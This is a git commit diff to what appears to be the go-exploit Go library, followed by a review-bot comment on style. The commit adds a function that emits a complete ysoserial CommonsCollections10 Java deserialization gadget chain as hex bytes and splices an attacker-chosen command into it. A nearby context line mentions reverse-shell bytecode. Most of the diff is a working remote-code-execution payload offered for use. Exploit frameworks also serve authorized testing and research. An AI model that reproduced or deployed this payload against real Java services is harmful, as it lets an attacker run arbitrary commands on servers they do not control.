
Commit 5dc1508

Added java deserialization exploit from CommonsCollections10
1 parent 2ddb259 commit 5dc1508


3 files changed

+293
-3
lines changed


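--- a/go.mod
+++ b/go.mod
@@ -8,7 +8,7 @@ require (
 golang.org/x/crypto v0.36.0
 golang.org/x/net v0.37.0
 golang.org/x/text v0.23.0
-modernc.org/sqlite v1.36.0
+modernc.org/sqlite v1.36.1
 )
 
 require (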

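--- a/go.sum
+++ b/go.sum
@@ -50,8 +50,8 @@ modernc.org/opt v0.1.4 h1:2kNGMRiUjrp4LcaPuLY2PzUfqM/w9N23quVwhKt5Qm8=
 modernc.org/opt v0.1.4/go.mod h1:03fq9lsNfvkYSfxrfUhZCWPk1lm4cq4N+Bh//bEtgns=
 modernc.org/sortutil v1.2.1 h1:+xyoGf15mM3NMlPDnFqrteY07klSFxLElE2PVuWIJ7w=
 modernc.org/sortutil v1.2.1/go.mod h1:7ZI3a3REbai7gzCLcotuw9AC4VZVpYMjDzETGsSMqJE=
-modernc.org/sqlite v1.36.0 h1:EQXNRn4nIS+gfsKeUTymHIz1waxuv5BzU7558dHSfH8=
-modernc.org/sqlite v1.36.0/go.mod h1:7MPwH7Z6bREicF9ZVUR78P1IKuxfZ8mRIDHD0iD+8TU=
+modernc.org/sqlite v1.36.1 h1:bDa8BJUH4lg6EGkLbahKe/8QqoF8p9gArSc6fTqYhyQ=
+modernc.org/sqlite v1.36.1/go.mod h1:7MPwH7Z6bREicF9ZVUR78P1IKuxfZ8mRIDHD0iD+8TU=
 modernc.org/strutil v1.2.1 h1:UneZBkQA+DX2Rp35KcM69cSsNES9ly8mQWD71HKlOA0=
 modernc.org/strutil v1.2.1/go.mod h1:EHkiggD70koQxjVdSBM3JKM7k6L0FbGE5eymy9i3B9A=
 modernc.org/token v1.1.0 h1:Xl7Ap9dKaEs5kLoOQeQmPWevfnk/DM5qcLcYlA8ys6Y=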

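--- a/java/javaclass.go
+++ b/java/javaclass.go
@@ -1,15 +1,305 @@
 package java
 
 import (
+"fmt"
 "encoding/binary"
 "strconv"
 "strings"
+"errors"
 
 "github.com/vulncheck-oss/go-exploit/config"
 "github.com/vulncheck-oss/go-exploit/random"
 "github.com/vulncheck-oss/go-exploit/transform"
 )
 
+var (
+errInvalidCommandLength = errors.New("invalid command length")
+)
+
+func ErrorInvalidCommandLength(msg string) error {
+return fmt.Errorf("%w: %s", errInvalidCommandLength, msg)
+}
+
+// Created using ysoserial with CommonsCollections10
+// It was created by allocating 255 space characters for the command
+// We just use what amount of that space we need for the command and put
+// the remaining spaces back after we're finished.
+// This does however mean that the commandStr has a length limitation of
+// the allocated space (255)
+func Commons11CommandBytecode(commandStr string) ([]byte, error) {
+if len(commandStr) > 255 {
+return []byte{}, ErrorInvalidCommandLength("command cannot be longer than 255 characters")
+}
+
+if len(commandStr) <= 0 {
+return []byte{}, ErrorInvalidCommandLength("command must be greater than 0 characters")
+}
+
+payloadBytes := "\xac\xed\x00\x05\x73\x72\x00\x11\x6a\x61\x76\x61"+
+"\x2e\x75\x74\x69\x6c\x2e\x48\x61\x73\x68\x53\x65"+
+"\x74\xba\x44\x85\x95\x96\xb8\xb7\x34\x03\x00\x00"+
+"\x78\x70\x77\x0c\x00\x00\x00\x02\x3f\x40\x00\x00"+
+"\x00\x00\x00\x01\x73\x72\x00\x34\x6f\x72\x67\x2e"+
+"\x61\x70\x61\x63\x68\x65\x2e\x63\x6f\x6d\x6d\x6f"+
+"\x6e\x73\x2e\x63\x6f\x6c\x6c\x65\x63\x74\x69\x6f"+
+"\x6e\x73\x2e\x6b\x65\x79\x76\x61\x6c\x75\x65\x2e"+
+"\x54\x69\x65\x64\x4d\x61\x70\x45\x6e\x74\x72\x79"+
+"\x8a\xad\xd2\x9b\x39\xc1\x1f\xdb\x02\x00\x02\x4c"+
+"\x00\x03\x6b\x65\x79\x74\x00\x12\x4c\x6a\x61\x76"+
+"\x61\x2f\x6c\x61\x6e\x67\x2f\x4f\x62\x6a\x65\x63"+
+"\x74\x3b\x4c\x00\x03\x6d\x61\x70\x74\x00\x0f\x4c"+
+"\x6a\x61\x76\x61\x2f\x75\x74\x69\x6c\x2f\x4d\x61"+
+"\x70\x3b\x78\x70\x73\x72\x00\x3a\x63\x6f\x6d\x2e"+
+"\x73\x75\x6e\x2e\x6f\x72\x67\x2e\x61\x70\x61\x63"+
+"\x68\x65\x2e\x78\x61\x6c\x61\x6e\x2e\x69\x6e\x74"+
+"\x65\x72\x6e\x61\x6c\x2e\x78\x73\x6c\x74\x63\x2e"+
+"\x74\x72\x61\x78\x2e\x54\x65\x6d\x70\x6c\x61\x74"+
+"\x65\x73\x49\x6d\x70\x6c\x09\x57\x4f\xc1\x6e\xac"+
+"\xab\x33\x03\x00\x06\x49\x00\x0d\x5f\x69\x6e\x64"+
+"\x65\x6e\x74\x4e\x75\x6d\x62\x65\x72\x49\x00\x0e"+
+"\x5f\x74\x72\x61\x6e\x73\x6c\x65\x74\x49\x6e\x64"+
+"\x65\x78\x5b\x00\x0a\x5f\x62\x79\x74\x65\x63\x6f"+
+"\x64\x65\x73\x74\x00\x03\x5b\x5b\x42\x5b\x00\x06"+
+"\x5f\x63\x6c\x61\x73\x73\x74\x00\x12\x5b\x4c\x6a"+
+"\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x43\x6c\x61"+
+"\x73\x73\x3b\x4c\x00\x05\x5f\x6e\x61\x6d\x65\x74"+
+"\x00\x12\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67"+
+"\x2f\x53\x74\x72\x69\x6e\x67\x3b\x4c\x00\x11\x5f"+
+"\x6f\x75\x74\x70\x75\x74\x50\x72\x6f\x70\x65\x72"+
+"\x74\x69\x65\x73\x74\x00\x16\x4c\x6a\x61\x76\x61"+
+"\x2f\x75\x74\x69\x6c\x2f\x50\x72\x6f\x70\x65\x72"+
+"\x74\x69\x65\x73\x3b\x78\x70\x00\x00\x00\x00\xff"+
+"\xff\xff\xff\x75\x72\x00\x03\x5b\x5b\x42\x4b\xfd"+
+"\x19\x15\x67\x67\xdb\x37\x02\x00\x00\x78\x70\x00"+
+"\x00\x00\x02\x75\x72\x00\x02\x5b\x42\xac\xf3\x17"+
+"\xf8\x06\x08\x54\xe0\x02\x00\x00\x78\x70\x00\x00"+
+"\x07\x93\xca\xfe\xba\xbe\x00\x00\x00\x32\x00\x39"+
+"\x0a\x00\x03\x00\x22\x07\x00\x37\x07\x00\x25\x07"+
+"\x00\x26\x01\x00\x10\x73\x65\x72\x69\x61\x6c\x56"+
+"\x65\x72\x73\x69\x6f\x6e\x55\x49\x44\x01\x00\x01"+
+"\x4a\x01\x00\x0d\x43\x6f\x6e\x73\x74\x61\x6e\x74"+
+"\x56\x61\x6c\x75\x65\x05\xad\x20\x93\xf3\x91\xdd"+
+"\xef\x3e\x01\x00\x06\x3c\x69\x6e\x69\x74\x3e\x01"+
+"\x00\x03\x28\x29\x56\x01\x00\x04\x43\x6f\x64\x65"+
+"\x01\x00\x0f\x4c\x69\x6e\x65\x4e\x75\x6d\x62\x65"+
+"\x72\x54\x61\x62\x6c\x65\x01\x00\x12\x4c\x6f\x63"+
+"\x61\x6c\x56\x61\x72\x69\x61\x62\x6c\x65\x54\x61"+
+"\x62\x6c\x65\x01\x00\x04\x74\x68\x69\x73\x01\x00"+
+"\x13\x53\x74\x75\x62\x54\x72\x61\x6e\x73\x6c\x65"+
+"\x74\x50\x61\x79\x6c\x6f\x61\x64\x01\x00\x0c\x49"+
+"\x6e\x6e\x65\x72\x43\x6c\x61\x73\x73\x65\x73\x01"+
+"\x00\x35\x4c\x79\x73\x6f\x73\x65\x72\x69\x61\x6c"+
+"\x2f\x70\x61\x79\x6c\x6f\x61\x64\x73\x2f\x75\x74"+
+"\x69\x6c\x2f\x47\x61\x64\x67\x65\x74\x73\x24\x53"+
+"\x74\x75\x62\x54\x72\x61\x6e\x73\x6c\x65\x74\x50"+
+"\x61\x79\x6c\x6f\x61\x64\x3b\x01\x00\x09\x74\x72"+
+"\x61\x6e\x73\x66\x6f\x72\x6d\x01\x00\x72\x28\x4c"+
+"\x63\x6f\x6d\x2f\x73\x75\x6e\x2f\x6f\x72\x67\x2f"+
+"\x61\x70\x61\x63\x68\x65\x2f\x78\x61\x6c\x61\x6e"+
+"\x2f\x69\x6e\x74\x65\x72\x6e\x61\x6c\x2f\x78\x73"+
+"\x6c\x74\x63\x2f\x44\x4f\x4d\x3b\x5b\x4c\x63\x6f"+
+"\x6d\x2f\x73\x75\x6e\x2f\x6f\x72\x67\x2f\x61\x70"+
+"\x61\x63\x68\x65\x2f\x78\x6d\x6c\x2f\x69\x6e\x74"+
+"\x65\x72\x6e\x61\x6c\x2f\x73\x65\x72\x69\x61\x6c"+
+"\x69\x7a\x65\x72\x2f\x53\x65\x72\x69\x61\x6c\x69"+
+"\x7a\x61\x74\x69\x6f\x6e\x48\x61\x6e\x64\x6c\x65"+
+"\x72\x3b\x29\x56\x01\x00\x08\x64\x6f\x63\x75\x6d"+
+"\x65\x6e\x74\x01\x00\x2d\x4c\x63\x6f\x6d\x2f\x73"+
+"\x75\x6e\x2f\x6f\x72\x67\x2f\x61\x70\x61\x63\x68"+
+"\x65\x2f\x78\x61\x6c\x61\x6e\x2f\x69\x6e\x74\x65"+
+"\x72\x6e\x61\x6c\x2f\x78\x73\x6c\x74\x63\x2f\x44"+
+"\x4f\x4d\x3b\x01\x00\x08\x68\x61\x6e\x64\x6c\x65"+
+"\x72\x73\x01\x00\x42\x5b\x4c\x63\x6f\x6d\x2f\x73"+
+"\x75\x6e\x2f\x6f\x72\x67\x2f\x61\x70\x61\x63\x68"+
+"\x65\x2f\x78\x6d\x6c\x2f\x69\x6e\x74\x65\x72\x6e"+
+"\x61\x6c\x2f\x73\x65\x72\x69\x61\x6c\x69\x7a\x65"+
+"\x72\x2f\x53\x65\x72\x69\x61\x6c\x69\x7a\x61\x74"+
+"\x69\x6f\x6e\x48\x61\x6e\x64\x6c\x65\x72\x3b\x01"+
+"\x00\x0a\x45\x78\x63\x65\x70\x74\x69\x6f\x6e\x73"+
+"\x07\x00\x27\x01\x00\xa6\x28\x4c\x63\x6f\x6d\x2f"+
+"\x73\x75\x6e\x2f\x6f\x72\x67\x2f\x61\x70\x61\x63"+
+"\x68\x65\x2f\x78\x61\x6c\x61\x6e\x2f\x69\x6e\x74"+
+"\x65\x72\x6e\x61\x6c\x2f\x78\x73\x6c\x74\x63\x2f"+
+"\x44\x4f\x4d\x3b\x4c\x63\x6f\x6d\x2f\x73\x75\x6e"+
+"\x2f\x6f\x72\x67\x2f\x61\x70\x61\x63\x68\x65\x2f"+
+"\x78\x6d\x6c\x2f\x69\x6e\x74\x65\x72\x6e\x61\x6c"+
+"\x2f\x64\x74\x6d\x2f\x44\x54\x4d\x41\x78\x69\x73"+
+"\x49\x74\x65\x72\x61\x74\x6f\x72\x3b\x4c\x63\x6f"+
+"\x6d\x2f\x73\x75\x6e\x2f\x6f\x72\x67\x2f\x61\x70"+
+"\x61\x63\x68\x65\x2f\x78\x6d\x6c\x2f\x69\x6e\x74"+
+"\x65\x72\x6e\x61\x6c\x2f\x73\x65\x72\x69\x61\x6c"+
+"\x69\x7a\x65\x72\x2f\x53\x65\x72\x69\x61\x6c\x69"+
+"\x7a\x61\x74\x69\x6f\x6e\x48\x61\x6e\x64\x6c\x65"+
+"\x72\x3b\x29\x56\x01\x00\x08\x69\x74\x65\x72\x61"+
+"\x74\x6f\x72\x01\x00\x35\x4c\x63\x6f\x6d\x2f\x73"+
+"\x75\x6e\x2f\x6f\x72\x67\x2f\x61\x70\x61\x63\x68"+
+"\x65\x2f\x78\x6d\x6c\x2f\x69\x6e\x74\x65\x72\x6e"+
+"\x61\x6c\x2f\x64\x74\x6d\x2f\x44\x54\x4d\x41\x78"+
+"\x69\x73\x49\x74\x65\x72\x61\x74\x6f\x72\x3b\x01"+
+"\x00\x07\x68\x61\x6e\x64\x6c\x65\x72\x01\x00\x41"+
+"\x4c\x63\x6f\x6d\x2f\x73\x75\x6e\x2f\x6f\x72\x67"+
+"\x2f\x61\x70\x61\x63\x68\x65\x2f\x78\x6d\x6c\x2f"+
+"\x69\x6e\x74\x65\x72\x6e\x61\x6c\x2f\x73\x65\x72"+
+"\x69\x61\x6c\x69\x7a\x65\x72\x2f\x53\x65\x72\x69"+
+"\x61\x6c\x69\x7a\x61\x74\x69\x6f\x6e\x48\x61\x6e"+
+"\x64\x6c\x65\x72\x3b\x01\x00\x0a\x53\x6f\x75\x72"+
+"\x63\x65\x46\x69\x6c\x65\x01\x00\x0c\x47\x61\x64"+
+"\x67\x65\x74\x73\x2e\x6a\x61\x76\x61\x0c\x00\x0a"+
+"\x00\x0b\x07\x00\x28\x01\x00\x33\x79\x73\x6f\x73"+
+"\x65\x72\x69\x61\x6c\x2f\x70\x61\x79\x6c\x6f\x61"+
+"\x64\x73\x2f\x75\x74\x69\x6c\x2f\x47\x61\x64\x67"+
+"\x65\x74\x73\x24\x53\x74\x75\x62\x54\x72\x61\x6e"+
+"\x73\x6c\x65\x74\x50\x61\x79\x6c\x6f\x61\x64\x01"+
+"\x00\x40\x63\x6f\x6d\x2f\x73\x75\x6e\x2f\x6f\x72"+
+"\x67\x2f\x61\x70\x61\x63\x68\x65\x2f\x78\x61\x6c"+
+"\x61\x6e\x2f\x69\x6e\x74\x65\x72\x6e\x61\x6c\x2f"+
+"\x78\x73\x6c\x74\x63\x2f\x72\x75\x6e\x74\x69\x6d"+
+"\x65\x2f\x41\x62\x73\x74\x72\x61\x63\x74\x54\x72"+
+"\x61\x6e\x73\x6c\x65\x74\x01\x00\x14\x6a\x61\x76"+
+"\x61\x2f\x69\x6f\x2f\x53\x65\x72\x69\x61\x6c\x69"+
+"\x7a\x61\x62\x6c\x65\x01\x00\x39\x63\x6f\x6d\x2f"+
+"\x73\x75\x6e\x2f\x6f\x72\x67\x2f\x61\x70\x61\x63"+
+"\x68\x65\x2f\x78\x61\x6c\x61\x6e\x2f\x69\x6e\x74"+
+"\x65\x72\x6e\x61\x6c\x2f\x78\x73\x6c\x74\x63\x2f"+
+"\x54\x72\x61\x6e\x73\x6c\x65\x74\x45\x78\x63\x65"+
+"\x70\x74\x69\x6f\x6e\x01\x00\x1f\x79\x73\x6f\x73"+
+"\x65\x72\x69\x61\x6c\x2f\x70\x61\x79\x6c\x6f\x61"+
+"\x64\x73\x2f\x75\x74\x69\x6c\x2f\x47\x61\x64\x67"+
+"\x65\x74\x73\x01\x00\x08\x3c\x63\x6c\x69\x6e\x69"+
+"\x74\x3e\x01\x00\x11\x6a\x61\x76\x61\x2f\x6c\x61"+
+"\x6e\x67\x2f\x52\x75\x6e\x74\x69\x6d\x65\x07\x00"+
+"\x2a\x01\x00\x0a\x67\x65\x74\x52\x75\x6e\x74\x69"+
+"\x6d\x65\x01\x00\x15\x28\x29\x4c\x6a\x61\x76\x61"+
+"\x2f\x6c\x61\x6e\x67\x2f\x52\x75\x6e\x74\x69\x6d"+
+"\x65\x3b\x0c\x00\x2c\x00\x2d\x0a\x00\x2b\x00\x2e"+
+
+// 255 characters were allocated, we just put back the unused
+// length as spaces
+"\x01\x00\xff" + commandStr + strings.Repeat(" ", 0xff-len(commandStr)) +
+
+"\x08\x00\x30\x01\x00\x04"+
+"\x65\x78\x65\x63\x01\x00\x27\x28\x4c\x6a\x61\x76"+
+"\x61\x2f\x6c\x61\x6e\x67\x2f\x53\x74\x72\x69\x6e"+
+"\x67\x3b\x29\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e"+
+"\x67\x2f\x50\x72\x6f\x63\x65\x73\x73\x3b\x0c\x00"+
+"\x32\x00\x33\x0a\x00\x2b\x00\x34\x01\x00\x0d\x53"+
+"\x74\x61\x63\x6b\x4d\x61\x70\x54\x61\x62\x6c\x65"+
+"\x01\x00\x1d\x79\x73\x6f\x73\x65\x72\x69\x61\x6c"+
+"\x2f\x50\x77\x6e\x65\x72\x37\x34\x30\x30\x32\x30"+
+"\x33\x39\x32\x34\x35\x37\x39\x31\x01\x00\x1f\x4c"+
+"\x79\x73\x6f\x73\x65\x72\x69\x61\x6c\x2f\x50\x77"+
+"\x6e\x65\x72\x37\x34\x30\x30\x32\x30\x33\x39\x32"+
+"\x34\x35\x37\x39\x31\x3b\x00\x21\x00\x02\x00\x03"+
+"\x00\x01\x00\x04\x00\x01\x00\x1a\x00\x05\x00\x06"+
+"\x00\x01\x00\x07\x00\x00\x00\x02\x00\x08\x00\x04"+
+"\x00\x01\x00\x0a\x00\x0b\x00\x01\x00\x0c\x00\x00"+
+"\x00\x2f\x00\x01\x00\x01\x00\x00\x00\x05\x2a\xb7"+
+"\x00\x01\xb1\x00\x00\x00\x02\x00\x0d\x00\x00\x00"+
+"\x06\x00\x01\x00\x00\x00\x2f\x00\x0e\x00\x00\x00"+
+"\x0c\x00\x01\x00\x00\x00\x05\x00\x0f\x00\x38\x00"+
+"\x00\x00\x01\x00\x13\x00\x14\x00\x02\x00\x0c\x00"+
+"\x00\x00\x3f\x00\x00\x00\x03\x00\x00\x00\x01\xb1"+
+"\x00\x00\x00\x02\x00\x0d\x00\x00\x00\x06\x00\x01"+
+"\x00\x00\x00\x33\x00\x0e\x00\x00\x00\x20\x00\x03"+
+"\x00\x00\x00\x01\x00\x0f\x00\x38\x00\x00\x00\x00"+
+"\x00\x01\x00\x15\x00\x16\x00\x01\x00\x00\x00\x01"+
+"\x00\x17\x00\x18\x00\x02\x00\x19\x00\x00\x00\x04"+
+"\x00\x01\x00\x1a\x00\x01\x00\x13\x00\x1b\x00\x02"+
+"\x00\x0c\x00\x00\x00\x49\x00\x00\x00\x04\x00\x00"+
+"\x00\x01\xb1\x00\x00\x00\x02\x00\x0d\x00\x00\x00"+
+"\x06\x00\x01\x00\x00\x00\x36\x00\x0e\x00\x00\x00"+
+"\x2a\x00\x04\x00\x00\x00\x01\x00\x0f\x00\x38\x00"+
+"\x00\x00\x00\x00\x01\x00\x15\x00\x16\x00\x01\x00"+
+"\x00\x00\x01\x00\x1c\x00\x1d\x00\x02\x00\x00\x00"+
+"\x01\x00\x1e\x00\x1f\x00\x03\x00\x19\x00\x00\x00"+
+"\x04\x00\x01\x00\x1a\x00\x08\x00\x29\x00\x0b\x00"+
+"\x01\x00\x0c\x00\x00\x00\x24\x00\x03\x00\x02\x00"+
+"\x00\x00\x0f\xa7\x00\x03\x01\x4c\xb8\x00\x2f\x12"+
+"\x31\xb6\x00\x35\x57\xb1\x00\x00\x00\x01\x00\x36"+
+"\x00\x00\x00\x03\x00\x01\x03\x00\x02\x00\x20\x00"+
+"\x00\x00\x02\x00\x21\x00\x11\x00\x00\x00\x0a\x00"+
+"\x01\x00\x02\x00\x23\x00\x10\x00\x09\x75\x71\x00"+
+"\x7e\x00\x0e\x00\x00\x01\xd4\xca\xfe\xba\xbe\x00"+
+"\x00\x00\x32\x00\x1b\x0a\x00\x03\x00\x15\x07\x00"+
+"\x17\x07\x00\x18\x07\x00\x19\x01\x00\x10\x73\x65"+
+"\x72\x69\x61\x6c\x56\x65\x72\x73\x69\x6f\x6e\x55"+
+"\x49\x44\x01\x00\x01\x4a\x01\x00\x0d\x43\x6f\x6e"+
+"\x73\x74\x61\x6e\x74\x56\x61\x6c\x75\x65\x05\x71"+
+"\xe6\x69\xee\x3c\x6d\x47\x18\x01\x00\x06\x3c\x69"+
+"\x6e\x69\x74\x3e\x01\x00\x03\x28\x29\x56\x01\x00"+
+"\x04\x43\x6f\x64\x65\x01\x00\x0f\x4c\x69\x6e\x65"+
+"\x4e\x75\x6d\x62\x65\x72\x54\x61\x62\x6c\x65\x01"+
+"\x00\x12\x4c\x6f\x63\x61\x6c\x56\x61\x72\x69\x61"+
+"\x62\x6c\x65\x54\x61\x62\x6c\x65\x01\x00\x04\x74"+
+"\x68\x69\x73\x01\x00\x03\x46\x6f\x6f\x01\x00\x0c"+
+"\x49\x6e\x6e\x65\x72\x43\x6c\x61\x73\x73\x65\x73"+
+"\x01\x00\x25\x4c\x79\x73\x6f\x73\x65\x72\x69\x61"+
+"\x6c\x2f\x70\x61\x79\x6c\x6f\x61\x64\x73\x2f\x75"+
+"\x74\x69\x6c\x2f\x47\x61\x64\x67\x65\x74\x73\x24"+
+"\x46\x6f\x6f\x3b\x01\x00\x0a\x53\x6f\x75\x72\x63"+
+"\x65\x46\x69\x6c\x65\x01\x00\x0c\x47\x61\x64\x67"+
+"\x65\x74\x73\x2e\x6a\x61\x76\x61\x0c\x00\x0a\x00"+
+"\x0b\x07\x00\x1a\x01\x00\x23\x79\x73\x6f\x73\x65"+
+"\x72\x69\x61\x6c\x2f\x70\x61\x79\x6c\x6f\x61\x64"+
+"\x73\x2f\x75\x74\x69\x6c\x2f\x47\x61\x64\x67\x65"+
+"\x74\x73\x24\x46\x6f\x6f\x01\x00\x10\x6a\x61\x76"+
+"\x61\x2f\x6c\x61\x6e\x67\x2f\x4f\x62\x6a\x65\x63"+
+"\x74\x01\x00\x14\x6a\x61\x76\x61\x2f\x69\x6f\x2f"+
+"\x53\x65\x72\x69\x61\x6c\x69\x7a\x61\x62\x6c\x65"+
+"\x01\x00\x1f\x79\x73\x6f\x73\x65\x72\x69\x61\x6c"+
+"\x2f\x70\x61\x79\x6c\x6f\x61\x64\x73\x2f\x75\x74"+
+"\x69\x6c\x2f\x47\x61\x64\x67\x65\x74\x73\x00\x21"+
+"\x00\x02\x00\x03\x00\x01\x00\x04\x00\x01\x00\x1a"+
+"\x00\x05\x00\x06\x00\x01\x00\x07\x00\x00\x00\x02"+
+"\x00\x08\x00\x01\x00\x01\x00\x0a\x00\x0b\x00\x01"+
+"\x00\x0c\x00\x00\x00\x2f\x00\x01\x00\x01\x00\x00"+
+"\x00\x05\x2a\xb7\x00\x01\xb1\x00\x00\x00\x02\x00"+
+"\x0d\x00\x00\x00\x06\x00\x01\x00\x00\x00\x3a\x00"+
+"\x0e\x00\x00\x00\x0c\x00\x01\x00\x00\x00\x05\x00"+
+"\x0f\x00\x12\x00\x00\x00\x02\x00\x13\x00\x00\x00"+
+"\x02\x00\x14\x00\x11\x00\x00\x00\x0a\x00\x01\x00"+
+"\x02\x00\x16\x00\x10\x00\x09\x70\x74\x00\x04\x50"+
+"\x77\x6e\x72\x70\x77\x01\x00\x78\x73\x72\x00\x2a"+
+"\x6f\x72\x67\x2e\x61\x70\x61\x63\x68\x65\x2e\x63"+
+"\x6f\x6d\x6d\x6f\x6e\x73\x2e\x63\x6f\x6c\x6c\x65"+
+"\x63\x74\x69\x6f\x6e\x73\x2e\x6d\x61\x70\x2e\x4c"+
+"\x61\x7a\x79\x4d\x61\x70\x6e\xe5\x94\x82\x9e\x79"+
+"\x10\x94\x03\x00\x01\x4c\x00\x07\x66\x61\x63\x74"+
+"\x6f\x72\x79\x74\x00\x2c\x4c\x6f\x72\x67\x2f\x61"+
+"\x70\x61\x63\x68\x65\x2f\x63\x6f\x6d\x6d\x6f\x6e"+
+"\x73\x2f\x63\x6f\x6c\x6c\x65\x63\x74\x69\x6f\x6e"+
+"\x73\x2f\x54\x72\x61\x6e\x73\x66\x6f\x72\x6d\x65"+
+"\x72\x3b\x78\x70\x73\x72\x00\x3a\x6f\x72\x67\x2e"+
+"\x61\x70\x61\x63\x68\x65\x2e\x63\x6f\x6d\x6d\x6f"+
+"\x6e\x73\x2e\x63\x6f\x6c\x6c\x65\x63\x74\x69\x6f"+
+"\x6e\x73\x2e\x66\x75\x6e\x63\x74\x6f\x72\x73\x2e"+
+"\x49\x6e\x76\x6f\x6b\x65\x72\x54\x72\x61\x6e\x73"+
+"\x66\x6f\x72\x6d\x65\x72\x87\xe8\xff\x6b\x7b\x7c"+
+"\xce\x38\x02\x00\x03\x5b\x00\x05\x69\x41\x72\x67"+
+"\x73\x74\x00\x13\x5b\x4c\x6a\x61\x76\x61\x2f\x6c"+
+"\x61\x6e\x67\x2f\x4f\x62\x6a\x65\x63\x74\x3b\x4c"+
+"\x00\x0b\x69\x4d\x65\x74\x68\x6f\x64\x4e\x61\x6d"+
+"\x65\x71\x00\x7e\x00\x09\x5b\x00\x0b\x69\x50\x61"+
+"\x72\x61\x6d\x54\x79\x70\x65\x73\x71\x00\x7e\x00"+
+"\x08\x78\x70\x75\x72\x00\x13\x5b\x4c\x6a\x61\x76"+
+"\x61\x2e\x6c\x61\x6e\x67\x2e\x4f\x62\x6a\x65\x63"+
+"\x74\x3b\x90\xce\x58\x9f\x10\x73\x29\x6c\x02\x00"+
+"\x00\x78\x70\x00\x00\x00\x00\x74\x00\x0e\x6e\x65"+
+"\x77\x54\x72\x61\x6e\x73\x66\x6f\x72\x6d\x65\x72"+
+"\x75\x72\x00\x12\x5b\x4c\x6a\x61\x76\x61\x2e\x6c"+
+"\x61\x6e\x67\x2e\x43\x6c\x61\x73\x73\x3b\xab\x16"+
+"\xd7\xae\xcb\xcd\x5a\x99\x02\x00\x00\x78\x70\x00"+
+"\x00\x00\x00\x73\x72\x00\x11\x6a\x61\x76\x61\x2e"+
+"\x75\x74\x69\x6c\x2e\x48\x61\x73\x68\x4d\x61\x70"+
+"\x05\x07\xda\xc1\xc3\x16\x60\xd1\x03\x00\x02\x46"+
+"\x00\x0a\x6c\x6f\x61\x64\x46\x61\x63\x74\x6f\x72"+
+"\x49\x00\x09\x74\x68\x72\x65\x73\x68\x6f\x6c\x64"+
+"\x78\x70\x3f\x40\x00\x00\x00\x00\x00\x00\x77\x08"+
+"\x00\x00\x00\x10\x00\x00\x00\x00\x78\x78\x78"
+
+return []byte(payloadBytes), nil
+}
+
 // This is the Java bytecode for a reverse shell. You can find the source code here:
 //
 // https://gist.github.com/j-baines/38eb6d16eed64986a369f7f981f57508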
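Review bot: The exported name `Commons11CommandBytecode` does not match the comment above it or the commit title, both of which say the blob was generated with ysoserial's CommonsCollections10; rename the function or correct the comment, and start the comment with the function name so it is picked up as the doc comment, e.g. `// Commons11CommandBytecode returns a serialized gadget chain with commandStr written into a fixed 255-byte slot.` The two guards compare `len(commandStr)`, which is a byte count, while both messages say "characters"; wording them in bytes would match what is enforced, and `len(commandStr) <= 0` can simply be `== 0`. `errInvalidCommandLength` is unexported, so callers outside the package cannot test for it with `errors.Is`; exporting the sentinel as `ErrInvalidCommandLength` and giving `ErrorInvalidCommandLength` a doc comment would make the error usable from other packages. The added imports `"fmt"` and `"errors"` are also out of gofmt order within the standard-library group.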
